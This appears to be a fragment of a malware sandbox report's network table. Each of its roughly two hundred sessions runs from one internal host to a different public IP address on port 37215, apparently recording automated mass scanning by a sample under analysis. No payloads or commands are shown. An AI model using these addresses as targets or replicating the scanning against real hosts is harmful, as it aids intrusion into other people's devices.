                                                  11804192.168.2.1350300157.109.169.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11805192.168.2.1339318197.220.201.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11806192.168.2.1343356157.17.31.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11807192.168.2.1334864157.83.81.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11808192.168.2.1346128157.113.245.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11809192.168.2.1347680157.4.134.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11810192.168.2.134289841.230.203.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11811192.168.2.1339732197.79.10.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11812192.168.2.135174041.44.107.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11813192.168.2.133703241.0.226.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11814192.168.2.1357740197.154.97.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11815192.168.2.133702641.80.225.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11816192.168.2.1349632152.17.34.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11817192.168.2.134157096.213.222.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11818192.168.2.1357094197.6.212.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11819192.168.2.1353148157.139.39.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11820192.168.2.134588441.199.198.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11821192.168.2.1338692197.50.133.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11822192.168.2.1337040197.184.24.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11823192.168.2.1335748157.44.122.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11824192.168.2.1342390197.178.63.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11825192.168.2.133798066.221.50.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11826192.168.2.1345476135.236.134.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11827192.168.2.134364041.91.236.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11828192.168.2.1357278157.135.182.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11829192.168.2.133982841.176.196.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11830192.168.2.1356166157.83.249.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11831192.168.2.1359146101.229.234.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11832192.168.2.133786241.24.201.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11833192.168.2.1353282157.139.173.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11834192.168.2.134320441.96.137.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11835192.168.2.1352458197.107.199.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11836192.168.2.1354336157.32.133.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11837192.168.2.1356754197.178.96.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11838192.168.2.135293041.220.109.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11839192.168.2.134056243.166.4.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11840192.168.2.1336654157.253.174.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11841192.168.2.1341356157.87.75.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11842192.168.2.1344966146.31.64.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11843192.168.2.1344482197.194.61.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11844192.168.2.135842041.210.241.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11845192.168.2.1338272157.14.146.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11846192.168.2.133739280.13.223.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11847192.168.2.134990492.60.107.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11848192.168.2.1358878157.104.82.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11849192.168.2.133631041.21.248.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11850192.168.2.1339942157.73.50.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11851192.168.2.135246041.10.239.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11852192.168.2.1344186157.242.230.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11853192.168.2.136037441.72.225.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11854192.168.2.1350372157.172.51.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11855192.168.2.13363864.159.9.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11856192.168.2.1338024197.153.232.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11857192.168.2.134337241.76.225.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11858192.168.2.133809441.50.52.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11859192.168.2.1359084197.55.196.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11860192.168.2.1355714212.65.1.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11861192.168.2.135535841.174.193.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11862192.168.2.134748641.97.239.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11863192.168.2.13452188.199.142.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11864192.168.2.1333926157.79.118.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11865192.168.2.134484641.190.123.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11866192.168.2.1342080167.199.37.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11867192.168.2.1341342157.218.112.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11868192.168.2.1339272157.0.118.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11869192.168.2.134560241.55.156.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11870192.168.2.133812063.49.198.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11871192.168.2.1353726186.72.30.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11872192.168.2.135570841.238.95.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11873192.168.2.1359268157.228.162.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11874192.168.2.1337920157.49.95.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11875192.168.2.1343074197.57.44.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11876192.168.2.1346686197.134.220.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11877192.168.2.134881841.5.70.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11878192.168.2.1349054197.64.75.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11879192.168.2.1355850105.6.26.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11880192.168.2.1336168197.55.110.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11881192.168.2.1337684157.11.146.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11882192.168.2.1353724223.79.166.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11883192.168.2.1333218197.65.118.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11884192.168.2.1350422197.93.27.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11885192.168.2.1351820157.166.202.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11886192.168.2.135062441.1.10.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11887192.168.2.1346122197.173.100.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11888192.168.2.1341836157.83.240.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11889192.168.2.1358226157.111.176.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11890192.168.2.135451697.175.82.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11891192.168.2.1338528184.228.234.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11892192.168.2.1354234197.91.65.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11893192.168.2.134174041.163.184.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11894192.168.2.1343698197.8.228.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11895192.168.2.1358714197.36.239.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11896192.168.2.1352642197.156.51.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11897192.168.2.134047841.120.56.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11898192.168.2.135356032.8.142.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11899192.168.2.135860641.235.183.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11900192.168.2.1359166197.32.34.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11901192.168.2.1358736197.140.218.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11902192.168.2.134471641.67.221.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11903192.168.2.135869854.133.100.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11904192.168.2.1357350176.249.237.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11905192.168.2.1344816197.236.28.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11906192.168.2.1357580197.93.228.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11907192.168.2.1349652144.7.135.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11908192.168.2.1351344197.220.12.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11909192.168.2.1352826197.140.53.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11910192.168.2.1356370206.158.44.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11911192.168.2.1334582197.44.26.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11912192.168.2.1334154157.173.42.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11913192.168.2.1348214157.242.1.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11914192.168.2.135749641.186.188.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11915192.168.2.1334510157.78.147.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11916192.168.2.1342034157.53.128.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11917192.168.2.1351034200.140.14.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11918192.168.2.1360050148.202.122.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11919192.168.2.135199241.177.79.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11920192.168.2.1358936151.200.186.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11921192.168.2.134798641.65.217.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11922192.168.2.133994641.60.95.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11923192.168.2.134889235.46.64.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11924192.168.2.1334480182.94.89.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11925192.168.2.1337896157.100.230.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11926192.168.2.133400267.239.233.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11927192.168.2.133825881.125.68.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11928192.168.2.134965041.185.22.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11929192.168.2.1358494197.65.98.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11930192.168.2.135216441.51.230.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11931192.168.2.1359098157.112.79.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11932192.168.2.135802041.55.93.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11933192.168.2.1335930197.84.126.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11934192.168.2.135253241.183.198.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11935192.168.2.134968841.104.255.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11936192.168.2.134662841.79.26.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11937192.168.2.1355814157.2.63.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11938192.168.2.134758241.83.135.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11939192.168.2.1334396107.101.155.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11940192.168.2.1350768157.87.75.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11941192.168.2.135423241.98.224.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11942192.168.2.1355858197.42.227.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11943192.168.2.134250441.149.18.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11944192.168.2.1346658157.0.215.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11945192.168.2.134333836.144.32.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11946192.168.2.133781841.251.165.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11947192.168.2.1352974157.42.45.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11948192.168.2.1353920157.184.219.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11949192.168.2.133940441.192.225.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11950192.168.2.1343308197.181.220.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11951192.168.2.1342064100.183.228.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11952192.168.2.135347237.207.242.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11953192.168.2.1337320197.76.57.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11954192.168.2.134047298.47.110.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11955192.168.2.1341984133.235.218.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11956192.168.2.135991637.36.93.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11957192.168.2.1351004197.209.11.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11958192.168.2.1358978157.101.93.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11959192.168.2.133656264.169.190.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11960192.168.2.133607841.208.165.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11961192.168.2.136067041.119.146.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11962192.168.2.134862641.98.170.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11963192.168.2.135318041.189.70.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11964192.168.2.135546041.18.54.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11965192.168.2.134582492.248.84.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11966192.168.2.136002641.79.118.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11967192.168.2.1349580157.79.213.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11968192.168.2.133550220.17.24.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11969192.168.2.1338364212.152.220.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11970192.168.2.1334894205.141.230.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11971192.168.2.133471458.108.133.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11972192.168.2.1355376197.120.69.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11973192.168.2.13466585.146.128.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11974192.168.2.135830841.139.91.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11975192.168.2.1355744197.9.191.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11976192.168.2.1360686178.242.193.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11977192.168.2.1351046197.150.196.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11978192.168.2.1358494157.195.0.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11979192.168.2.1336392197.229.102.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11980192.168.2.135366441.212.201.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11981192.168.2.133921641.148.54.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11982192.168.2.1338292197.39.172.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11983192.168.2.1340084157.251.80.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11984192.168.2.1333346197.250.45.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11985192.168.2.1348754157.138.223.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11986192.168.2.1355140157.13.208.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11987192.168.2.134744041.133.24.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11988192.168.2.1356948187.67.208.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11989192.168.2.133630480.116.250.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11990192.168.2.1356364157.249.19.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11991192.168.2.1345104157.112.181.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11992192.168.2.1356038157.129.51.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11993192.168.2.1356362157.107.108.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11994192.168.2.1356278197.50.204.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11995192.168.2.134936841.171.224.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11996192.168.2.134074241.118.152.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11997192.168.2.1355232221.199.123.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11998192.168.2.1355872197.47.234.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11999192.168.2.134384899.252.152.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12000192.168.2.1347772197.181.18.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12001192.168.2.1334950157.132.152.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12002192.168.2.134023841.18.89.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12003192.168.2.1337474197.195.128.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12004192.168.2.1356402157.212.116.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12005192.168.2.134191441.232.186.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12006192.168.2.1353720197.45.90.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12007192.168.2.134898041.96.120.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12008192.168.2.133795853.44.183.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12009192.168.2.1356114197.207.250.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12010192.168.2.134302241.115.16.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12011192.168.2.1346898157.192.90.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12012192.168.2.1349434157.8.19.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12013192.168.2.1357404157.9.188.537215
                                                  TimestampBytes transferredDirectionData


